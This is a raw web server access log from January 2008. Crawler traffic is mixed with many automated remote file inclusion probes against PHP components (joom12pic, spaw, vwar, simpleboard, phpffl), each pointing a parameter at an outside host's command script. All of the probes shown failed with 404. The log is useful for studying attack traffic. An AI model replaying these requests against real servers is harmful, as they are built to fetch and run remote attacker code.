69.10.155.237 - - [10/Jan/2008:13:08:34 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:08:34 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:08:37 -0800] "GET /retreat1/IMG_2749.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:08:47 -0800] "GET /retreat1/IMG_2750.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
85.17.208.82 - - [10/Jan/2008:13:08:51 -0800] "GET /logs/access_071210.log/*coppercop/theme.php?THEME_DIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:08:57 -0800] "GET /retreat1/IMG_2751.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:07 -0800] "GET /retreat1/IMG_2752.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:17 -0800] "GET /retreat1/IMG_2753.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:13:09:21 -0800] "GET /logs/access_071225.log//inc_ext/spaw/dialogs/table.php?spaw_root=http://arcantus.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:13:09:22 -0800] "GET /logs//inc_ext/spaw/dialogs/table.php?spaw_root=http://arcantus.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:27 -0800] "GET /retreat1/IMG_2754.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:37 -0800] "GET /retreat1/IMG_2755.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:47 -0800] "GET /retreat1/IMG_2756.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:09:57 -0800] "GET /retreat1/IMG_2757.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:07 -0800] "GET /retreat1/IMG_2758.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:17 -0800] "GET /retreat1/IMG_2759.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:27 -0800] "GET /retreat1/IMG_2760.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:37 -0800] "GET /retreat1/IMG_2761.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:47 -0800] "GET /retreat1/IMG_2762.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:10:57 -0800] "GET /retreat1/IMG_2764.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:07 -0800] "GET /retreat1/IMG_2765.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:13:11:16 -0800] "GET /logs/access_071221.log//inc_ext/spaw/dialogs/table.php?spaw_root=http://arcantus.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:17 -0800] "GET /retreat1/IMG_2766.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:27 -0800] "GET /retreat1/IMG_2767.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:37 -0800] "GET /retreat1/IMG_2768.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:47 -0800] "GET /retreat1/IMG_2769.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:11:57 -0800] "GET /retreat1/IMG_2770.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:07 -0800] "GET /retreat1/IMG_2771.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:17 -0800] "GET /retreat1/IMG_2774.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:27 -0800] "GET /retreat1/IMG_2775.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:37 -0800] "GET /retreat1/IMG_2776.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:47 -0800] "GET /retreat1/IMG_2777.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
74.6.24.225 - - [10/Jan/2008:13:12:48 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:12:57 -0800] "GET /retreat1/IMG_2778.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:12:58 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:13:07 -0800] "GET /retreat1/IMG_2779.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
193.69.41.130 - - [10/Jan/2008:13:13:09 -0800] "GET /modules/postguestbook/styles/internal_v5/header.php?tpl_pgb_moddir=http://tiagow.us/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:13:17 -0800] "GET /retreat1/IMG_2780.JPG HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:13:37 -0800] "GET /retreat1/work/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:13:47 -0800] "GET /tmp/?M=A HTTP/1.0" 200 1657 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:13:57 -0800] "GET /tmp/?S=A HTTP/1.0" 200 1657 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:07 -0800] "GET /tmp/?D=A HTTP/1.0" 200 1657 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:11 -0800] "GET /retreat1/webcam/ HTTP/1.0" 200 196254 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:17 -0800] "GET /tmp/mailError.log HTTP/1.0" 200 749 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:20 -0800] "GET /logs/access_071229.log//index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:21 -0800] "GET //index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:21 -0800] "GET /logs//index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:23 -0800] "GET /logs/access_071229.log//index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:23 -0800] "GET //index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:24 -0800] "GET /logs//index.php?seite=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:25 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.0.78.8 - - [10/Jan/2008:13:14:25 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.laila.jp/item_pics/derf/vox.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:27 -0800] "GET /tmp/sess_29e7439fd5f74f974aea6887d22a65ea HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:37 -0800] "GET /tmp/sess_3d4c3880bdacccd0de3b408052522ecd HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:47 -0800] "GET /tmp/sess_47c6756212fa7a947d494cee052e843c HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:14:57 -0800] "GET /tmp/sess_8199a92cf7cb5082699a1dc0794f27d3 HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:15:07 -0800] "GET /tmp/sess_e43188fd03ba16b3c1b406676c7153d7 HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:13:15:17 -0800] "GET /tmp/sess_ffbac37426f31e6462b0d0c89f68bd07 HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.159.3.234 - - [10/Jan/2008:13:16:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:13:16:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:13:16:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:13:16:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:13:16:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.109.226 - - [10/Jan/2008:13:16:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:16:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:16:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:16:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:16:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:16:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:16:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:16:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:16:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.229.26.205 - - [10/Jan/2008:13:16:49 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
87.229.26.205 - - [10/Jan/2008:13:16:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:13:17:30 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.55.148.27 - - [10/Jan/2008:13:17:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.asolutionsts.com/sugarcrm/id4.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:17:42 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:17:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:13:17:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:13:18:33 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:13:18:33 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:13:18:33 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
164.8.231.2 - - [10/Jan/2008:13:18:53 -0800] "GET /logs/access_071229.log//index.php?seite=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [10/Jan/2008:13:18:54 -0800] "GET //index.php?seite=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
164.8.231.2 - - [10/Jan/2008:13:18:54 -0800] "GET /logs//index.php?seite=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:19:37 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:19:41 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:19:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.7.73 - - [10/Jan/2008:13:19:53 -0800] "GET /logs/access_071017.log HTTP/1.0" 200 21727 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:20:30 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:20:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:20:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.80.40.5 - - [10/Jan/2008:13:20:31 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:20:56 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:20:56 -0800] "GET /modifyform.html?code=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:20:56 -0800] "GET /logs/modifyform.html?code=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:20:59 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:21:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:21:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:21:00 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:21:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:21:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:21:05 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:21:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:21:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:21:53 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:21:53 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.35 - - [10/Jan/2008:13:21:53 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:22:04 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:22:04 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.68.153 - - [10/Jan/2008:13:22:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:22:11 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:22:11 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:22:11 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:22:11 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.35.196.47 - - [10/Jan/2008:13:22:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.14.74.68 - - [10/Jan/2008:13:22:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/file/mic.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:22:32 -0800] "GET /logs/access_071225.log/modifyform.html?code=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.57.81.49 - - [10/Jan/2008:13:24:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:25:14 -0800] "GET /logs/access_071224.log/old_reports.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:25:14 -0800] "GET /old_reports.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [10/Jan/2008:13:25:15 -0800] "GET /logs/old_reports.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:25:28 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.155.237 - - [10/Jan/2008:13:25:28 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.slmsistemas.net/components/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
